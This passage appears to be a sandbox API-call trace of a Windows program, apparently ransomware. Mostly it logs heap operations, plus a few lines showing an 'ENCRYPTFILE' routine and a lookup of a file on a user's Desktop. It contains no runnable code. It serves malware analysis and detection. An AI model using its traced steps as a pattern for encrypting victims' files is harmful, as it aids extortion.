wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0124.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0124.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0124.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0124.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0124.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0124.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0124.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0124.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0124.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0124.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a75c0 | out: hHeap=0x1780000) returned 1 [0124.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0124.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0124.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0124.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0124.210] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0124.210] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0124.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0124.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0124.264] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0124.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0124.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0124.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0124.265] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2200 [0124.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0124.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0124.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0124.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0124.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0124.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0124.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0124.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0124.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0124.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0124.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0124.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0124.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0124.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7b00 [0124.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0124.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0124.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0124.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0124.266] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0124.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9890 [0124.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0124.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0124.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0124.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0124.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0124.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0124.267] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0124.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0124.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0124.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0124.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0124.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0124.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0124.267] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0124.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0124.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0124.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0124.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0124.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0124.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0124.267] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\MDF9dFhi.gif", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x120f2ee0, ftCreationTime.dwHighDateTime=0x1d5e117, ftLastAccessTime.dwLowDateTime=0xd5a93410, ftLastAccessTime.dwHighDateTime=0x1d5e755, ftLastWriteTime.dwLowDateTime=0xd5a93410, ftLastWriteTime.dwHighDateTime=0x1d5e755, nFileSizeHigh=0x0, nFileSizeLow=0x6e44, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="MDF9dFhi.gif", cAlternateFileName="")) returned 0x41ac500 [0124.267] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0124.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0124.267] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0124.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0124.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0124.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0124.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0124.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392308 [0124.268] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0124.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392308 | out: hHeap=0x1780000) returned 1 [0124.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0124.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0124.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2320 [0124.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0124.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0124.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0124.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0124.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0124.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e00 [0124.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0124.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0124.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0124.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0124.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0124.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0124.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0124.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0124.268] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0124.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0124.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0124.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0124.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0124.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0124.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0124.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0124.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0124.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923e8 [0124.269] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0124.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923e8 | out: hHeap=0x1780000) returned 1 [0124.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0124.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0124.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2230 [0124.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0124.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0124.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0124.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0124.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0124.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2300 [0124.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0124.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0124.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0124.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2130 [0124.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0124.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0124.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0124.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d88 [0124.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0124.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0124.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0124.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0124.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0124.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0124.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0124.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0124.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0124.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0124.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0124.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0124.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0124.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0124.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0124.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0124.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0124.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0124.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0124.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0124.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0124.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0124.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0124.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0124.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0124.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0124.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0124.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0124.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0124.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392260 [0124.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0124.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0124.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0124.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0124.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0124.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0124.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0124.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0124.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0124.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0124.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0124.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0124.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0124.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0124.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0124.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0124.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0124.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0124.271] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0124.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0124.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0124.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0124.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0124.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0124.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0124.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0124.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0124.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0124.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0124.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0124.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0124.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0124.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0124.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0124.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0124.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0124.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0124.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0124.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0124.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0124.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0124.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0124.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0124.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0124.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0124.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0124.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0124.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0124.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0124.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0124.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0124.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0124.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0124.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0124.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0124.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0124.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0124.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0124.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0124.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0124.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0124.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0124.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0124.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0124.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0124.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0124.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0124.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0124.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0124.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0124.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0124.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0124.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0124.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0124.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0124.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0124.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0124.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0124.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0124.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0124.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0124.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0124.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0124.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0124.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0124.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0124.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0124.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0124.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0124.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0124.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0124.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0124.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0124.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0124.274] 